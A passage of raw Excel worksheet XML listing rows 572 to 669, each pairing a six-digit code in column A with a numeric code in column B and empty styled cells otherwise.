      </c>
      <c r="B572" s="3">
        <v>901059.00100000005</v>
      </c>
      <c r="D572" s="5"/>
      <c r="E572" s="3"/>
      <c r="F572" s="1"/>
      <c r="H572" s="1"/>
    </row>
    <row r="573" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A573" s="5">
        <v>700534</v>
      </c>
      <c r="B573" s="3">
        <v>901059.00300000003</v>
      </c>
      <c r="D573" s="5"/>
      <c r="E573" s="3"/>
      <c r="F573" s="1"/>
      <c r="H573" s="1"/>
    </row>
    <row r="574" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A574" s="5">
        <v>700534</v>
      </c>
      <c r="B574" s="3">
        <v>901005</v>
      </c>
      <c r="D574" s="5"/>
      <c r="E574" s="3"/>
      <c r="F574" s="1"/>
      <c r="H574" s="1"/>
    </row>
    <row r="575" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A575" s="5">
        <v>700534</v>
      </c>
      <c r="B575" s="3">
        <v>901140</v>
      </c>
      <c r="D575" s="5"/>
      <c r="E575" s="3"/>
      <c r="F575" s="1"/>
      <c r="H575" s="1"/>
    </row>
    <row r="576" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A576" s="5">
        <v>700534</v>
      </c>
      <c r="B576" s="3">
        <v>901482</v>
      </c>
      <c r="D576" s="5"/>
      <c r="E576" s="3"/>
      <c r="F576" s="1"/>
      <c r="H576" s="1"/>
    </row>
    <row r="577" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A577" s="5">
        <v>700534</v>
      </c>
      <c r="B577" s="3">
        <v>901568.00199999998</v>
      </c>
      <c r="D577" s="5"/>
      <c r="E577" s="3"/>
      <c r="F577" s="1"/>
      <c r="H577" s="1"/>
    </row>
    <row r="578" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A578" s="5">
        <v>700534</v>
      </c>
      <c r="B578" s="3">
        <v>901573.00100000005</v>
      </c>
      <c r="D578" s="5"/>
      <c r="E578" s="3"/>
      <c r="F578" s="1"/>
      <c r="H578" s="1"/>
    </row>
    <row r="579" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A579" s="5">
        <v>700534</v>
      </c>
      <c r="B579" s="3">
        <v>901083</v>
      </c>
      <c r="D579" s="5"/>
      <c r="E579" s="3"/>
      <c r="F579" s="1"/>
      <c r="H579" s="1"/>
    </row>
    <row r="580" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A580" s="5">
        <v>700534</v>
      </c>
      <c r="B580" s="3">
        <v>901562.00100000005</v>
      </c>
      <c r="D580" s="5"/>
      <c r="E580" s="3"/>
      <c r="F580" s="1"/>
      <c r="H580" s="1"/>
    </row>
    <row r="581" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A581" s="5">
        <v>700534</v>
      </c>
      <c r="B581" s="3">
        <v>901070</v>
      </c>
      <c r="D581" s="5"/>
      <c r="E581" s="3"/>
      <c r="F581" s="1"/>
      <c r="H581" s="1"/>
    </row>
    <row r="582" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A582" s="5">
        <v>700534</v>
      </c>
      <c r="B582" s="3">
        <v>901070.00399999996</v>
      </c>
      <c r="D582" s="5"/>
      <c r="E582" s="3"/>
      <c r="F582" s="1"/>
      <c r="H582" s="1"/>
    </row>
    <row r="583" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A583" s="5">
        <v>700534</v>
      </c>
      <c r="B583" s="3">
        <v>901105</v>
      </c>
      <c r="D583" s="5"/>
      <c r="E583" s="3"/>
      <c r="F583" s="1"/>
      <c r="H583" s="1"/>
    </row>
    <row r="584" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A584" s="5">
        <v>700534</v>
      </c>
      <c r="B584" s="3">
        <v>901036.00399999996</v>
      </c>
      <c r="D584" s="5"/>
      <c r="E584" s="3"/>
      <c r="F584" s="1"/>
      <c r="H584" s="1"/>
    </row>
    <row r="585" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A585" s="5">
        <v>700534</v>
      </c>
      <c r="B585" s="3">
        <v>901036.005</v>
      </c>
      <c r="D585" s="5"/>
      <c r="E585" s="3"/>
      <c r="F585" s="1"/>
      <c r="H585" s="1"/>
    </row>
    <row r="586" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A586" s="5">
        <v>700534</v>
      </c>
      <c r="B586" s="3">
        <v>901036.00699999998</v>
      </c>
      <c r="D586" s="5"/>
      <c r="E586" s="3"/>
      <c r="F586" s="1"/>
      <c r="H586" s="1"/>
    </row>
    <row r="587" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A587" s="5">
        <v>700534</v>
      </c>
      <c r="B587" s="3">
        <v>901104</v>
      </c>
      <c r="D587" s="5"/>
      <c r="E587" s="3"/>
      <c r="F587" s="1"/>
      <c r="H587" s="1"/>
    </row>
    <row r="588" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A588" s="5">
        <v>700534</v>
      </c>
      <c r="B588" s="3">
        <v>901106</v>
      </c>
      <c r="D588" s="5"/>
      <c r="E588" s="3"/>
      <c r="F588" s="1"/>
      <c r="H588" s="1"/>
    </row>
    <row r="589" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A589" s="5">
        <v>700534</v>
      </c>
      <c r="B589" s="3">
        <v>901135</v>
      </c>
      <c r="D589" s="5"/>
      <c r="E589" s="3"/>
      <c r="F589" s="1"/>
      <c r="H589" s="1"/>
    </row>
    <row r="590" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A590" s="5">
        <v>700534</v>
      </c>
      <c r="B590" s="3">
        <v>901027</v>
      </c>
      <c r="D590" s="5"/>
      <c r="E590" s="3"/>
      <c r="F590" s="1"/>
      <c r="H590" s="1"/>
    </row>
    <row r="591" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A591" s="5">
        <v>700534</v>
      </c>
      <c r="B591" s="3">
        <v>901027.00199999998</v>
      </c>
      <c r="D591" s="5"/>
      <c r="E591" s="3"/>
      <c r="F591" s="1"/>
      <c r="H591" s="1"/>
    </row>
    <row r="592" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A592" s="5">
        <v>700534</v>
      </c>
      <c r="B592" s="3">
        <v>901566.00199999998</v>
      </c>
      <c r="D592" s="5"/>
      <c r="E592" s="3"/>
      <c r="F592" s="1"/>
      <c r="H592" s="1"/>
    </row>
    <row r="593" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A593" s="5">
        <v>700534</v>
      </c>
      <c r="B593" s="3">
        <v>901057</v>
      </c>
      <c r="D593" s="5"/>
      <c r="E593" s="3"/>
      <c r="F593" s="1"/>
      <c r="H593" s="1"/>
    </row>
    <row r="594" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A594" s="5">
        <v>700534</v>
      </c>
      <c r="B594" s="3">
        <v>901055</v>
      </c>
      <c r="D594" s="5"/>
      <c r="E594" s="3"/>
      <c r="F594" s="1"/>
      <c r="H594" s="1"/>
    </row>
    <row r="595" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A595" s="5">
        <v>700534</v>
      </c>
      <c r="B595" s="3">
        <v>901055.01199999999</v>
      </c>
      <c r="D595" s="5"/>
      <c r="E595" s="3"/>
      <c r="F595" s="1"/>
      <c r="H595" s="1"/>
    </row>
    <row r="596" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A596" s="5">
        <v>700534</v>
      </c>
      <c r="B596" s="3">
        <v>901055.01300000004</v>
      </c>
      <c r="D596" s="5"/>
      <c r="E596" s="3"/>
      <c r="F596" s="1"/>
      <c r="H596" s="1"/>
    </row>
    <row r="597" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A597" s="5">
        <v>700534</v>
      </c>
      <c r="B597" s="3">
        <v>901012</v>
      </c>
      <c r="D597" s="5"/>
      <c r="E597" s="3"/>
      <c r="F597" s="1"/>
      <c r="H597" s="1"/>
    </row>
    <row r="598" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A598" s="5">
        <v>700534</v>
      </c>
      <c r="B598" s="3">
        <v>901018</v>
      </c>
      <c r="D598" s="5"/>
      <c r="E598" s="3"/>
      <c r="F598" s="1"/>
      <c r="H598" s="1"/>
    </row>
    <row r="599" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A599" s="5">
        <v>700534</v>
      </c>
      <c r="B599" s="3">
        <v>901053.005</v>
      </c>
      <c r="D599" s="5"/>
      <c r="E599" s="3"/>
      <c r="F599" s="1"/>
      <c r="H599" s="1"/>
    </row>
    <row r="600" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A600" s="5">
        <v>700534</v>
      </c>
      <c r="B600" s="3">
        <v>901518</v>
      </c>
      <c r="D600" s="5"/>
      <c r="E600" s="3"/>
      <c r="F600" s="1"/>
      <c r="H600" s="1"/>
    </row>
    <row r="601" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A601" s="5">
        <v>700534</v>
      </c>
      <c r="B601" s="3">
        <v>901518.00100000005</v>
      </c>
      <c r="D601" s="5"/>
      <c r="E601" s="3"/>
      <c r="F601" s="1"/>
      <c r="H601" s="1"/>
    </row>
    <row r="602" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A602" s="5">
        <v>700534</v>
      </c>
      <c r="B602" s="3">
        <v>901553.00199999998</v>
      </c>
      <c r="D602" s="5"/>
      <c r="E602" s="3"/>
      <c r="F602" s="1"/>
      <c r="H602" s="1"/>
    </row>
    <row r="603" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A603" s="5">
        <v>700534</v>
      </c>
      <c r="B603" s="3">
        <v>901082</v>
      </c>
      <c r="D603" s="5"/>
      <c r="E603" s="3"/>
      <c r="F603" s="1"/>
      <c r="H603" s="1"/>
    </row>
    <row r="604" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A604" s="5">
        <v>700534</v>
      </c>
      <c r="B604" s="3">
        <v>901016</v>
      </c>
      <c r="D604" s="5"/>
      <c r="E604" s="3"/>
      <c r="F604" s="1"/>
      <c r="H604" s="1"/>
    </row>
    <row r="605" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A605" s="5">
        <v>700534</v>
      </c>
      <c r="B605" s="3">
        <v>901033</v>
      </c>
      <c r="D605" s="5"/>
      <c r="E605" s="3"/>
      <c r="F605" s="1"/>
      <c r="H605" s="1"/>
    </row>
    <row r="606" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A606" s="5">
        <v>700534</v>
      </c>
      <c r="B606" s="3">
        <v>901124</v>
      </c>
      <c r="D606" s="5"/>
      <c r="E606" s="3"/>
      <c r="F606" s="1"/>
      <c r="H606" s="1"/>
    </row>
    <row r="607" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A607" s="5">
        <v>700534</v>
      </c>
      <c r="B607" s="3">
        <v>901204.00100000005</v>
      </c>
      <c r="D607" s="5"/>
      <c r="E607" s="3"/>
      <c r="F607" s="1"/>
      <c r="H607" s="1"/>
    </row>
    <row r="608" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A608" s="5">
        <v>700534</v>
      </c>
      <c r="B608" s="3">
        <v>901497</v>
      </c>
      <c r="D608" s="5"/>
      <c r="E608" s="3"/>
      <c r="F608" s="1"/>
      <c r="H608" s="1"/>
    </row>
    <row r="609" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A609" s="5">
        <v>700534</v>
      </c>
      <c r="B609" s="3">
        <v>901497.00300000003</v>
      </c>
      <c r="D609" s="5"/>
      <c r="E609" s="3"/>
      <c r="F609" s="1"/>
      <c r="H609" s="1"/>
    </row>
    <row r="610" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A610" s="5">
        <v>700534</v>
      </c>
      <c r="B610" s="3">
        <v>901102</v>
      </c>
      <c r="D610" s="5"/>
      <c r="E610" s="3"/>
      <c r="F610" s="1"/>
      <c r="H610" s="1"/>
    </row>
    <row r="611" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A611" s="5">
        <v>700534</v>
      </c>
      <c r="B611" s="3">
        <v>901047</v>
      </c>
      <c r="D611" s="5"/>
      <c r="E611" s="3"/>
      <c r="F611" s="1"/>
      <c r="H611" s="1"/>
    </row>
    <row r="612" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A612" s="5">
        <v>700470</v>
      </c>
      <c r="B612" s="3">
        <v>901071.00100000005</v>
      </c>
      <c r="D612" s="5"/>
      <c r="E612" s="3"/>
      <c r="F612" s="1"/>
      <c r="H612" s="1"/>
    </row>
    <row r="613" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A613" s="5">
        <v>700470</v>
      </c>
      <c r="B613" s="3">
        <v>901059.00300000003</v>
      </c>
      <c r="D613" s="5"/>
      <c r="E613" s="3"/>
      <c r="F613" s="1"/>
      <c r="H613" s="1"/>
    </row>
    <row r="614" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A614" s="5">
        <v>700470</v>
      </c>
      <c r="B614" s="3">
        <v>901140</v>
      </c>
      <c r="D614" s="5"/>
      <c r="E614" s="3"/>
      <c r="F614" s="1"/>
      <c r="H614" s="1"/>
    </row>
    <row r="615" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A615" s="5">
        <v>700470</v>
      </c>
      <c r="B615" s="3">
        <v>901105</v>
      </c>
      <c r="D615" s="5"/>
      <c r="E615" s="3"/>
      <c r="F615" s="1"/>
      <c r="H615" s="1"/>
    </row>
    <row r="616" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A616" s="5">
        <v>700470</v>
      </c>
      <c r="B616" s="3">
        <v>901027.00300000003</v>
      </c>
      <c r="D616" s="5"/>
      <c r="E616" s="3"/>
      <c r="F616" s="1"/>
      <c r="H616" s="1"/>
    </row>
    <row r="617" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A617" s="5">
        <v>700470</v>
      </c>
      <c r="B617" s="3">
        <v>901055</v>
      </c>
      <c r="D617" s="5"/>
      <c r="E617" s="3"/>
      <c r="F617" s="1"/>
      <c r="H617" s="1"/>
    </row>
    <row r="618" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A618" s="5">
        <v>700127</v>
      </c>
      <c r="B618" s="3">
        <v>901071.00100000005</v>
      </c>
      <c r="D618" s="5"/>
      <c r="E618" s="3"/>
      <c r="F618" s="1"/>
      <c r="H618" s="1"/>
    </row>
    <row r="619" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A619" s="5">
        <v>700127</v>
      </c>
      <c r="B619" s="3">
        <v>901560.00199999998</v>
      </c>
      <c r="D619" s="5"/>
      <c r="E619" s="3"/>
      <c r="F619" s="1"/>
      <c r="H619" s="1"/>
    </row>
    <row r="620" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A620" s="5">
        <v>700127</v>
      </c>
      <c r="B620" s="3">
        <v>901547.00100000005</v>
      </c>
      <c r="D620" s="5"/>
      <c r="E620" s="3"/>
      <c r="F620" s="1"/>
      <c r="H620" s="1"/>
    </row>
    <row r="621" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A621" s="5">
        <v>700127</v>
      </c>
      <c r="B621" s="3">
        <v>901543.00300000003</v>
      </c>
      <c r="D621" s="5"/>
      <c r="E621" s="3"/>
      <c r="F621" s="1"/>
      <c r="H621" s="1"/>
    </row>
    <row r="622" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A622" s="5">
        <v>700127</v>
      </c>
      <c r="B622" s="3">
        <v>901140</v>
      </c>
      <c r="D622" s="5"/>
      <c r="E622" s="3"/>
      <c r="F622" s="1"/>
      <c r="H622" s="1"/>
    </row>
    <row r="623" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A623" s="5">
        <v>700127</v>
      </c>
      <c r="B623" s="3">
        <v>901573.00100000005</v>
      </c>
      <c r="D623" s="5"/>
      <c r="E623" s="3"/>
      <c r="F623" s="1"/>
      <c r="H623" s="1"/>
    </row>
    <row r="624" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A624" s="5">
        <v>700127</v>
      </c>
      <c r="B624" s="3">
        <v>901546.01500000001</v>
      </c>
      <c r="D624" s="5"/>
      <c r="E624" s="3"/>
      <c r="F624" s="1"/>
      <c r="H624" s="1"/>
    </row>
    <row r="625" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A625" s="5">
        <v>700127</v>
      </c>
      <c r="B625" s="3">
        <v>901083</v>
      </c>
      <c r="D625" s="5"/>
      <c r="E625" s="3"/>
      <c r="F625" s="1"/>
      <c r="H625" s="1"/>
    </row>
    <row r="626" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A626" s="5">
        <v>700127</v>
      </c>
      <c r="B626" s="3">
        <v>901574.00199999998</v>
      </c>
      <c r="D626" s="5"/>
      <c r="E626" s="3"/>
      <c r="F626" s="1"/>
      <c r="H626" s="1"/>
    </row>
    <row r="627" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A627" s="5">
        <v>700127</v>
      </c>
      <c r="B627" s="3">
        <v>901070.00399999996</v>
      </c>
      <c r="D627" s="5"/>
      <c r="E627" s="3"/>
      <c r="F627" s="1"/>
      <c r="H627" s="1"/>
    </row>
    <row r="628" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A628" s="5">
        <v>700127</v>
      </c>
      <c r="B628" s="3">
        <v>901057</v>
      </c>
      <c r="D628" s="5"/>
      <c r="E628" s="3"/>
      <c r="F628" s="1"/>
      <c r="H628" s="1"/>
    </row>
    <row r="629" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A629" s="5">
        <v>700127</v>
      </c>
      <c r="B629" s="3">
        <v>901055.01199999999</v>
      </c>
      <c r="D629" s="5"/>
      <c r="E629" s="3"/>
      <c r="F629" s="1"/>
      <c r="H629" s="1"/>
    </row>
    <row r="630" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A630" s="5">
        <v>700127</v>
      </c>
      <c r="B630" s="3">
        <v>901007</v>
      </c>
      <c r="D630" s="5"/>
      <c r="E630" s="3"/>
      <c r="F630" s="1"/>
      <c r="H630" s="1"/>
    </row>
    <row r="631" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A631" s="5">
        <v>700127</v>
      </c>
      <c r="B631" s="3">
        <v>901569.00199999998</v>
      </c>
      <c r="D631" s="5"/>
      <c r="E631" s="3"/>
      <c r="F631" s="1"/>
      <c r="H631" s="1"/>
    </row>
    <row r="632" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A632" s="5">
        <v>700574</v>
      </c>
      <c r="B632" s="3">
        <v>901001.00100000005</v>
      </c>
      <c r="D632" s="5"/>
      <c r="E632" s="3"/>
      <c r="F632" s="1"/>
      <c r="H632" s="1"/>
    </row>
    <row r="633" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A633" s="5">
        <v>700574</v>
      </c>
      <c r="B633" s="3">
        <v>901140</v>
      </c>
      <c r="D633" s="5"/>
      <c r="E633" s="3"/>
      <c r="F633" s="1"/>
      <c r="H633" s="1"/>
    </row>
    <row r="634" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A634" s="5">
        <v>700574</v>
      </c>
      <c r="B634" s="3">
        <v>901573.00100000005</v>
      </c>
      <c r="D634" s="5"/>
      <c r="E634" s="3"/>
      <c r="F634" s="1"/>
      <c r="H634" s="1"/>
    </row>
    <row r="635" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A635" s="5">
        <v>700574</v>
      </c>
      <c r="B635" s="3">
        <v>901105</v>
      </c>
      <c r="D635" s="5"/>
      <c r="E635" s="3"/>
      <c r="F635" s="1"/>
      <c r="H635" s="1"/>
    </row>
    <row r="636" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A636" s="5">
        <v>700574</v>
      </c>
      <c r="B636" s="3">
        <v>901106</v>
      </c>
      <c r="D636" s="5"/>
      <c r="E636" s="3"/>
      <c r="F636" s="1"/>
      <c r="H636" s="1"/>
    </row>
    <row r="637" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A637" s="5">
        <v>700574</v>
      </c>
      <c r="B637" s="3">
        <v>901571</v>
      </c>
      <c r="D637" s="5"/>
      <c r="E637" s="3"/>
      <c r="F637" s="1"/>
      <c r="H637" s="1"/>
    </row>
    <row r="638" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A638" s="5">
        <v>700574</v>
      </c>
      <c r="B638" s="3">
        <v>901027</v>
      </c>
      <c r="D638" s="5"/>
      <c r="E638" s="3"/>
      <c r="F638" s="1"/>
      <c r="H638" s="1"/>
    </row>
    <row r="639" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A639" s="5">
        <v>700574</v>
      </c>
      <c r="B639" s="3">
        <v>901012</v>
      </c>
      <c r="D639" s="5"/>
      <c r="E639" s="3"/>
      <c r="F639" s="1"/>
      <c r="H639" s="1"/>
    </row>
    <row r="640" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A640" s="5">
        <v>700574</v>
      </c>
      <c r="B640" s="3">
        <v>901124</v>
      </c>
      <c r="D640" s="5"/>
      <c r="E640" s="3"/>
      <c r="F640" s="1"/>
      <c r="H640" s="1"/>
    </row>
    <row r="641" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A641" s="5">
        <v>700574</v>
      </c>
      <c r="B641" s="3">
        <v>901497.00300000003</v>
      </c>
      <c r="D641" s="5"/>
      <c r="E641" s="3"/>
      <c r="F641" s="1"/>
      <c r="H641" s="1"/>
    </row>
    <row r="642" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A642" s="5">
        <v>700017</v>
      </c>
      <c r="B642" s="3">
        <v>901059.00300000003</v>
      </c>
      <c r="D642" s="5"/>
      <c r="E642" s="3"/>
      <c r="F642" s="1"/>
      <c r="H642" s="1"/>
    </row>
    <row r="643" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A643" s="5">
        <v>700017</v>
      </c>
      <c r="B643" s="3">
        <v>901008</v>
      </c>
      <c r="D643" s="5"/>
      <c r="E643" s="3"/>
      <c r="F643" s="1"/>
      <c r="H643" s="1"/>
    </row>
    <row r="644" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A644" s="5">
        <v>700017</v>
      </c>
      <c r="B644" s="3">
        <v>901105</v>
      </c>
      <c r="D644" s="5"/>
      <c r="E644" s="3"/>
      <c r="F644" s="1"/>
      <c r="H644" s="1"/>
    </row>
    <row r="645" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A645" s="5">
        <v>700017</v>
      </c>
      <c r="B645" s="3">
        <v>901056.00100000005</v>
      </c>
      <c r="D645" s="5"/>
      <c r="E645" s="3"/>
      <c r="F645" s="1"/>
      <c r="H645" s="1"/>
    </row>
    <row r="646" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A646" s="5">
        <v>700017</v>
      </c>
      <c r="B646" s="3">
        <v>901057</v>
      </c>
      <c r="D646" s="5"/>
      <c r="E646" s="3"/>
      <c r="F646" s="1"/>
      <c r="H646" s="1"/>
    </row>
    <row r="647" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A647" s="5">
        <v>700017</v>
      </c>
      <c r="B647" s="3">
        <v>901113</v>
      </c>
      <c r="D647" s="5"/>
      <c r="E647" s="3"/>
      <c r="F647" s="1"/>
      <c r="H647" s="1"/>
    </row>
    <row r="648" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A648" s="5">
        <v>700017</v>
      </c>
      <c r="B648" s="3">
        <v>901082</v>
      </c>
      <c r="D648" s="5"/>
      <c r="E648" s="3"/>
      <c r="F648" s="1"/>
      <c r="H648" s="1"/>
    </row>
    <row r="649" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A649" s="5">
        <v>700017</v>
      </c>
      <c r="B649" s="3">
        <v>901033</v>
      </c>
      <c r="D649" s="5"/>
      <c r="E649" s="3"/>
      <c r="F649" s="1"/>
      <c r="H649" s="1"/>
    </row>
    <row r="650" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A650" s="5">
        <v>700268</v>
      </c>
      <c r="B650" s="3">
        <v>901071.00100000005</v>
      </c>
      <c r="D650" s="5"/>
      <c r="E650" s="3"/>
      <c r="F650" s="1"/>
      <c r="H650" s="1"/>
    </row>
    <row r="651" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A651" s="5">
        <v>700268</v>
      </c>
      <c r="B651" s="3">
        <v>901547.00100000005</v>
      </c>
      <c r="D651" s="5"/>
      <c r="E651" s="3"/>
      <c r="F651" s="1"/>
      <c r="H651" s="1"/>
    </row>
    <row r="652" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A652" s="5">
        <v>700268</v>
      </c>
      <c r="B652" s="3">
        <v>901059.00300000003</v>
      </c>
      <c r="D652" s="5"/>
      <c r="E652" s="3"/>
      <c r="F652" s="1"/>
      <c r="H652" s="1"/>
    </row>
    <row r="653" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A653" s="5">
        <v>700268</v>
      </c>
      <c r="B653" s="3">
        <v>901059.005</v>
      </c>
      <c r="D653" s="5"/>
      <c r="E653" s="3"/>
      <c r="F653" s="1"/>
      <c r="H653" s="1"/>
    </row>
    <row r="654" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A654" s="5">
        <v>700268</v>
      </c>
      <c r="B654" s="3">
        <v>901132.00100000005</v>
      </c>
      <c r="D654" s="5"/>
      <c r="E654" s="3"/>
      <c r="F654" s="1"/>
      <c r="H654" s="1"/>
    </row>
    <row r="655" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A655" s="5">
        <v>700268</v>
      </c>
      <c r="B655" s="3">
        <v>901140</v>
      </c>
      <c r="D655" s="5"/>
      <c r="E655" s="3"/>
      <c r="F655" s="1"/>
      <c r="H655" s="1"/>
    </row>
    <row r="656" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A656" s="5">
        <v>700268</v>
      </c>
      <c r="B656" s="3">
        <v>901573.00100000005</v>
      </c>
      <c r="D656" s="5"/>
      <c r="E656" s="3"/>
      <c r="F656" s="1"/>
      <c r="H656" s="1"/>
    </row>
    <row r="657" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A657" s="5">
        <v>700268</v>
      </c>
      <c r="B657" s="3">
        <v>901083</v>
      </c>
      <c r="D657" s="5"/>
      <c r="E657" s="3"/>
      <c r="F657" s="1"/>
      <c r="H657" s="1"/>
    </row>
    <row r="658" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A658" s="5">
        <v>700268</v>
      </c>
      <c r="B658" s="3">
        <v>901070.00399999996</v>
      </c>
      <c r="D658" s="5"/>
      <c r="E658" s="3"/>
      <c r="F658" s="1"/>
      <c r="H658" s="1"/>
    </row>
    <row r="659" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A659" s="5">
        <v>700268</v>
      </c>
      <c r="B659" s="3">
        <v>901105</v>
      </c>
      <c r="D659" s="5"/>
      <c r="E659" s="3"/>
      <c r="F659" s="1"/>
      <c r="H659" s="1"/>
    </row>
    <row r="660" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A660" s="5">
        <v>700268</v>
      </c>
      <c r="B660" s="3">
        <v>901027</v>
      </c>
      <c r="D660" s="5"/>
      <c r="E660" s="3"/>
      <c r="F660" s="1"/>
      <c r="H660" s="1"/>
    </row>
    <row r="661" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A661" s="5">
        <v>700268</v>
      </c>
      <c r="B661" s="3">
        <v>901057</v>
      </c>
      <c r="D661" s="5"/>
      <c r="E661" s="3"/>
      <c r="F661" s="1"/>
      <c r="H661" s="1"/>
    </row>
    <row r="662" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A662" s="5">
        <v>700268</v>
      </c>
      <c r="B662" s="3">
        <v>901218.01100000006</v>
      </c>
      <c r="D662" s="5"/>
      <c r="E662" s="3"/>
      <c r="F662" s="1"/>
      <c r="H662" s="1"/>
    </row>
    <row r="663" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A663" s="5">
        <v>700268</v>
      </c>
      <c r="B663" s="3">
        <v>901082</v>
      </c>
      <c r="D663" s="5"/>
      <c r="E663" s="3"/>
      <c r="F663" s="1"/>
      <c r="H663" s="1"/>
    </row>
    <row r="664" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A664" s="5">
        <v>700268</v>
      </c>
      <c r="B664" s="3">
        <v>901016</v>
      </c>
      <c r="D664" s="5"/>
      <c r="E664" s="3"/>
      <c r="F664" s="1"/>
      <c r="H664" s="1"/>
    </row>
    <row r="665" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A665" s="5">
        <v>700268</v>
      </c>
      <c r="B665" s="3">
        <v>901124</v>
      </c>
      <c r="D665" s="5"/>
      <c r="E665" s="3"/>
      <c r="F665" s="1"/>
      <c r="H665" s="1"/>
    </row>
    <row r="666" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A666" s="5">
        <v>700268</v>
      </c>
      <c r="B666" s="3">
        <v>901497</v>
      </c>
      <c r="D666" s="5"/>
      <c r="E666" s="3"/>
      <c r="F666" s="1"/>
      <c r="H666" s="1"/>
    </row>
    <row r="667" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A667" s="5">
        <v>700570</v>
      </c>
      <c r="B667" s="3">
        <v>901548.00199999998</v>
      </c>
      <c r="D667" s="5"/>
      <c r="E667" s="3"/>
      <c r="F667" s="1"/>
      <c r="H667" s="1"/>
    </row>
    <row r="668" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A668" s="5">
        <v>700570</v>
      </c>
      <c r="B668" s="3">
        <v>901134.00100000005</v>
      </c>
      <c r="D668" s="5"/>
      <c r="E668" s="3"/>
      <c r="F668" s="1"/>
      <c r="H668" s="1"/>
    </row>
    <row r="669" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A669" s="5">
        <v>700570</v>
      </c>
      <c r="B669" s="3">
        <v>901087.00100000005</v>
      </c>
      <c r="D669" s="5"/>
      <c r="E669" s="3"/>
      <c r="F669" s="1"/>
      <c r="H669" s="1"/>
    </row>
